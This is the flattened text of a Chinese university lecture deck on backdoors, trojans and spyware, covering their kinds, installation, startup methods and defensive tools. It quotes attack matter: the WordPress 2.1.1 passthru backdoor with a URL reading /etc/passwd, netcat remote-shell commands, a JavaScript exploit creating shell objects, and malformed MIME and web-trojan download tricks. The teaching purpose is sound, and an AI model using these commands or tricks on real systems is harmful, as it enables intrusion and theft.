后门木马rootblek基本用法及防御.ppt

恶意软件的分析与防范 严飞武汉大学计算机学院yanfeiclass 课时安排 恶意代码概述计算机病毒网络蠕虫网页 移动恶意代码后门 木马和Rootkit常用检测技术和工具课堂讨论与练习期末考试 后门 后门是一个允许攻击者绕过系统中常规安全控制机制的程序 他按照攻击者自己的意图提供通道 后门的重点在于为攻击者提供进入目标计算机的通道 后门类型 从功能上分类 系统级后门 在系统层能访问数据和进程应用级后门 逃逸安全机制的合法程序密码级后门 能够以某种方式看懂密文 后门类型 从控制方法分类 本地权限的提升对系统有访问权的攻击者变换其权限等级成为管理员 然后攻击者可以重新设置该系统或访问人和存储在系统中的文件 单个命令的远程执行攻击者可以向目标计算机发送消息 每次执行一个单独的命令 后门执行攻击者的命令并将输出返回给攻击者 远程命令行解释器访问如远程Shell 这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示 其比 单个命令的远程执行 要强大得多 远程控制GUI攻击者可以看到目标计算机的GUI 控制鼠标的移动 输入对键盘的操作 这些都通过网络实现 后门的安装 自己植入 物理接触或入侵之后 漏洞病毒蠕虫恶意移动代码社会工程 欺骗受害者自己安装 Email远程共享BT下载 Example 2001年 Borland的数据库软件Interbase发现隐藏了七年的后门 程序中包含一个万能密码和用户名 用户名是 politically 密码是 correct 用户包括波音 诺基亚 摩托罗拉和波士顿股票交易所 Sun等 Example 2007年 Wordpress2 1 1远程命令执行后门漏洞黑客攻击了WordPress的下载网站 修改了代码如下在wp includes theme php文件中 functionget theme mcommand mcds passthru mcds if GET iz get theme mcommand GET iz passthru 会执行通过iz变量传入的PHP代码 如攻击 http wordpressurl wp includes theme php iz cat etc passwd 后门连接工具 NetCat 通用的网络连接工具用法一 nc l p5000 ecmd exenc127 0 0 15000用法二 nc l p5000nc127 0 0 15000 ecmd execshell exe 其他Windows下的后门程序 CryptCatTini提供通向Tcp端口7777 只有3K 曾经的一个优秀网站 无端口后门 如何唤醒 ICMP后门不使用TCP UDP协议 使用ICMP协议进行通信 难以检测 非混合型探测后门攻击者将触发指令发送到对方计算机 难以检测 Cd00r syntoportx syntoporty syntoportz 混合型探测后门只要攻击者将触发指令发送到对方网络中即可触发后门 更加难以检测 syntoportx syntoportx syntoportxindifferentIps 反弹式木马 反弹式木马访问客户端的80端口 防火墙无法限制 例如 网络神偷 GUI GraphicsUserInterface 远程控制 灰鸽子并非所有的GUI远程控制都是恶意的VNC VirtualNetworkComputing WindowsTerminalServicesPCAnywhereBackOrifice2000 VNC 英国剑桥大学AT T实验室在2002年开发的轻量型的远程控制计算机软件 任何人都可免费取得该软件 VNC软件主要由两个部分组成 VNCserver及VNCviewer VNCserver与VNCviewer支持多种操作系统 如windows Linux MacOS及Unix系列 Unix Solaris等 因此可将VNCserver及VNCviewer分别安装在不同的操作系统中进行控制 也可以通过一般的网络浏览器 如IE等 来控制被控端 需要Java虚拟机的支持 VNC程序举例 后门的启动 感染普通执行文件或系统文件添加程序到 开始 程序 启动 选项修改系统配置文件win ini system ini wininit ini winstart bat autoexec bat等的相关启动选项通过修改注册表启动键值修改文件关联的打开方式添加计划任务利用自定义文件夹风格注册为InternetExplorer的BHO BrowserHelperObject 组件具体请参考 Windows的自启动方式 一文 检测Windows后门启动技术 手工检测注册表启动键值启动选项关联方式计划任务 利用工具检测MsconfigAutoRuns AutoRuns的运行界面 如何防御后门 普通后门 培养良好的安全意识和习惯 使用网络防火墙封锁与端口的连接 仅允许最少数量的端口通信通过防火墙天网个人防火墙 瑞星防火墙 江民黑客防火墙 ZoneAlarm NortonPersonalFirewall 经常利用端口扫描器扫描主机或端口查看工具查找本地端口监听程序 Nmap Xscan NC Fport TcpView IceSword 如何防御后门 无端口后门 查找不寻常的程序查找不寻常的进程利用基于网络的IDS查找隐蔽的后门命令 如Snort 检测本地和网络中的混杂模式的网卡本地检测嗅探器 Promiscdetect exe 远程检测嗅探器 Sentinel AntiSniff 2 特洛伊木马 特洛伊木马是一个程序 他看起来具有某个有用的或善意的目的 但是实际上掩盖着一些隐藏的恶意功能 欺骗用户或者系统管理员安装在计算机上与 正常 的程序一起混合运行 将自己伪装得看起来属于该系统 后门VS特洛伊木马 如果一个程序仅仅提供远程访问 那么它只是一个后门 如果攻击者将这些后门功能伪装成某些其他良性程序 那么就涉及到真正的特洛伊木马 特洛伊木马 木马系统软件一般由木马配置程序 控制端程序和木马程序 服务器程序 等三部分组成 木马程序 也称服务器程序 它驻留在受害者的系统中 非法获取其操作权限 负责接收控制端指令 并根据指令或配置发送数据给控制端 木马配置程序设置木马程序的端口号 触发条件 木马名称等 使其在服务端藏得更隐蔽 有时该配置功能被集成在控制端程序菜单内 不单独作为一个程序 控制端程序控制远程服务器 有些程序集成了木马配置的功能 2 1名字欺骗 修改文件的文件名以欺骗用户与Windows扩展名放在一起Beauty jpg exe模仿其他文件名httpd iexplore notepad ups svchost 不能用 任务管理器 删除的进程名Csrss exe services exe smss exe winlogon exe system systemidleprocess路径威胁如将木马命名为explorer exe放在C 下 对命名陷阱的防御 确定指定进程属于哪个程序Fport icesword tcpview 使用杀进程工具进行查杀Pskill icesword 2 2文件捆绑 恶意程序与正常程序捆绑捆绑工具EXE捆绑机 Wrappers binders EXEbinders CHM Flash 压缩软件 winrar WinRMSetup30 exe防御使用反病毒软件进行检测 并及时更新病毒库 2 3软件下载 从网上下载的软件是你真正需要的软件吗 从网上下载的软件是否被恶意修改过 防御措施用户注意完整性检测 如MD5 FileChecker 小心测试新软件 2 4软件本身带毒 内部员工注入恶意代码软件开发的全球化趋势多个部门联合开发软件 一层层的外包 2 5Html传播 网页病毒的传播方式Flash传播网页email传播网页Chm传播网页木马Exe2bmp正常网页中携带 1 美丽的网页名称 以及利用浏览者的无知 URL1 plmm001 gif SHOW Flash传播网页 用FlashMX制作 第一帧 打开动作面板 进入Actions Brower NetWork GetUrlhttp 网页木马地址 windows self第二帧 Actions Brower NetWork loadmoviehttp swf email传播网页 1 Window open email传播网页 3 4 5 email传播网页 Chm传播网页木马 x htm orEasyCHMorQuickchm把x htm和x exe生成x chm exe2bmp exe2bmp可以将一个 exe可执行文件生成同名的 bmp asp htm三个文件 将这三个文件放到支持ASP的空间里边 当别人打开 htm网页文件的时候 先前的 exe木马将被自动下载到对方的硬盘并运行 Forexamplex exeproduce x bmp x asp x htm x htm 数据装载中 可能需要10秒至30秒 x asp 1 在cache中寻找1 bmp2 把bmp还原为exe3 执行exe 正常网页中携带 Window openOnload onerror 网页病毒 网页木马的原理 Javascript Exception Exploit JS WSH错误的MIMEMultipurposeInternetMailExtentions 多用途的网际邮件扩充协议头 IE5 0到IE6 0EXEto BMP Javascritp Exception Exploitiframe漏洞的利用 父窗口能在子域环境下运行脚本代码 包括任意的恶意代码通过安全认证的CAB COXEXE文件的捆绑 Javascript Exception Exploit Functiondestroy try a1 document applets 0 a1 setCLSID F935DC22 1CF0 11D0 ADB9 00C04FD58A0B a1 createInstance Shl a1 GetObject a1 setCLSID 0D43FE01 F093 11CF 8940 00A0C9054228 a1 createInstance FSO a1 GetObject a1 setCLSID F935DC26 1CF0 11D0 ADB9 00C04FD58A0B a1 createInstance Net a1 GetObject try dosomething catch e catch e functiondo setTimeout destroy 1000 设定运行时间1秒 do 坏事执行函数指令 错误的MIMEMultipurposeInternetMailExtentions Content Type multipart related type multipart alternative boundary B B Content Type multipart alternative boundary A A Content Type text html Content Transfer Encoding quoted printable A B Content Type audio x wav name run exe 可以改为其他脚本文件Content Transfer Encoding base64Content ID 以下省略AAAAAN 1个 当申明邮件的类型为audio x wav时 IE存在的一个漏洞会将附件认为是音频文件自动尝试打开 iframe iframesrc run emlwidth 0height 0 iframe Startup html startupdocument getElementById clientcall click HTA HTA的全名为HTMLApplication参见x asp 各种溢出型漏洞 iframe溢出Javaprxy DLLCOM对象堆溢出漏洞 木马的发展 加入Rootkit 隐藏文件 端口 服务 进程等HTTP隧道HyDan 把信息隐藏在二进制文件中 Then szTempFile 0 True method POST 木马检测工具 安天实验室 安天防线 木马克星 木马克星可以查杀8122种国际木马 1053种密码偷窃木马 保证查杀传奇密码偷窃木马 灰鸽子API反杀病毒软件类木马 冰河类文件关联木马 密码解霸 奇迹射手等游戏密码邮寄木马 内置木马防火墙 任何黑客程序试图发送密码邮件 都需要Iparmor确认 不仅可以查杀木马 更可以反查黑客密码 间谍软件 他们以主动收集用户个人信息 相关机密文件或隐私数据为主 搜集到的数据会主动传送到指定服务器 间谍软件发展之初 多被一些在线广告商以及Kazaa等音乐交换网站使用 这些公司将一些监控程序放在用户电脑内监视其网上行为 收集其兴趣爱好 或者在空闲时间进行其它操作 这些公司以让用户上网免费赚钱或免费获得音乐为幌子 吸引了众多用户下载 而这些软件中所带的间谍程序便悄悄地收集用户信息 然后根据这些信息发送广告 或者把这些收集的信息转卖给其他广告公司获取利益 间谍软件的传播方式 软件捆绑和嵌套浏览网站 恶意网页或网页木马 邮件发送利用漏洞进行主动传播和植入 多隐身于蠕虫之中 部分间谍和广告软件 CoolWebSearch 可能是最下流也最恶毒的程序之一 它完全劫持了IE浏览器 害你什么事都做不成 PurityScan 一个显示弹出广告 声称可以发现并删除个人电脑上的色情内容的程序 Transponder vx2 一个IE 浏览器助手 它能够监控网络浏览并发送相关广告 KeenValue是一个广告程序 它收集个人信息并向计算机用户发送广告 PerfectKeylogger一个记录所访问过的站点 击键的记录和鼠标的移动的工具 它记录下用户的口令和账户等信息 发展趋势 逐渐融合了各种病毒 蠕虫 木马 甚至Rootkit的技术和特点 无处不在 危害特别巨大 其会变得越来越普遍 越来越复杂 功能越来越就有针对性和目的性 自我隐藏技术则会越来越先进 这将给间谍软件的检测带来巨大挑战 间谍软件检测工具 1 SpybotSearchandDestroy 简称 SpyBotS D 能扫描你的硬盘 然后找出你硬盘里面的广告和间谍程序 然后把这些会对你的电脑产生危害的程序移除 支持常用的所有浏览器 2 SpySweeper 让你免受间谍软件的影响 它能在你浏览网页 浏览邮件 下载软件的时候给予你充足的保护 免受间谍软件的入侵 保护个人的信息 间谍软件检测工具 3 SpywareDoctor 是一个先进的间谍软件 广告软件公用程序 它可以检查并从你的电脑移走间谍软件 广告软件 木马程序 键盘记录器和追踪威胁 4 SpyRemover 专门为清除悄悄安装在你的电脑里的间谍程序而设计的一个计算机网络安全工具 它可以帮助你快速的在系统组件中搜索已知的间谍程序的踪迹 并可以帮助你安全的清除他们 全面保护你的网络安全 支持多国语言 间谍软件检测工具 5 微软 AntiSpyware 6 McAfee企业版反间谍软件 其可有效侦测及降低遭受间谍程序 spyware 广告软件 adware 色情拨号程序 dialers 键盘记录软件 keyloggers cookies文件和远程控制程序等潜在恶意程序 PUPs 的袭击 AnyQuestions